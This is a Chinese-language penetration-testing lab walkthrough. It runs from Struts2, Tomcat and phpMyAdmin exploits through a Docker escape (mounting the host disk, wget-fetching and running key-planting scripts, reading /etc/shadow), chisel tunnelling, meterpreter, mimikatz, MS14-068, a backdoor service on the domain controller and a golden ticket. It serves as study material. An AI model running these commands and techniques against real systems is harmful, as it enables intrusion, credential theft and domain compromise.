进入Ubuntu的web虚拟机,ubuntu为我们的web环境,其中的web环境需要手动开启,全部为docker环境,需要启动的环境分别为:s2-045、CVE-2017-12615、cve-2018-12613,启动方法如下:
sudo su ubuntu docker-compose build docker-compose up
环境全部开启效果如下:
通过nmap发现主机开启以下服务 端口2001是考察的str2的框架漏洞,使用工具进行验证并上传shell进行连接。 端口2002是Tomcat/8.5.19是CVE-2017-12615,使用PUT方法进行上传文件,然后连接shell。 端口2003是phpmyadmin版本号是4.8.1,存在任意文件包含漏洞 三个端口的漏洞都利用完毕,下步拿下域内pc以及域控,使用ssh密钥进行docker逃逸。 利用kali的searchsploit搜索Tomcat的poc,新建一个文件夹key,将poc复制到keys下,进行验证并上传shell 找到对应的版本漏洞 将poc复制到key文件下,使用python进行验证 然后访问pwn.jsp 使用密钥建立用户然后docker逃逸 ls /dev mkdir /test mount /dev/sda1 /test ls -alh /test ls -alh /test/home/ubuntu/.ssh/ 在当前目录下生成一个密钥,然后创建一个命令执行脚本 复制test.pub的内容到key.sh里 使用python开启web服务器,然后用wget进行下载key.sh 赋予key.sh权限,执行以后查看.ssh目录是否写入了authorized_keys chmod 777 key.sh ./key.sh ls -alh /test/home/ubuntu/.ssh 使用密钥查看是否能登录机器 再写一个命令脚本进行创建文件并输出密钥 查看本机kali的密码 cat /etc/shadow 查看sudoers 写好以后,使用wget进行下载 chmod 777 add.sh ./add.sh
写入成功 本地文件夹一共有以下文件,现在进行登录服务器,断网了重启了一下ip变了~~ 到这docker就逃逸成功了,下面进行内网渗透 下载chisel 在Ubuntu里使用wget 下载chisel,然后开启服务端 ./chisel_1.7.3_linux_amd64 server -p 4545 --sockc5 ./chisel_1.7.3_linux_amd64 client 192.168.157.131:4545 socks 进入msfconsole 成功打入,进行域内信息搜集 获取域内信息 Domain Computers: \TESTWIN7-PC \WIN-ENS2VR5TR3N 切换到user权限 Domain controllers: WIN-ENS2VR5TR3N 域名:demo.com
域管账户:Administrator 获取域内用户 寻找域控ip:192.168.183.130
获取sid user uid: S-1-5-21-979886063-1111900045-1414766810-1107
domain uid: S-1-5-21-979886063-1111900045-1414766810
返回meterpreter,回到system权限使用mimikatz抓取密码
进入到shell,桌面有工具利用ms14-068 使用命令关闭防火墙 生成一个exe的后门,并上传至根目录 将win7的update.exe复制到域控机器 创建服务成功,开启防火墙,运行update,设置监听
设置msf的监听 成功拿到meterpreter 将权限变为administrator,然后加载kiwi,获取NTLM Hash 回到win7的session,将票据给清空,再生产黄金票据。
写的比较杂乱,大佬勿喷,有什么问题请留言!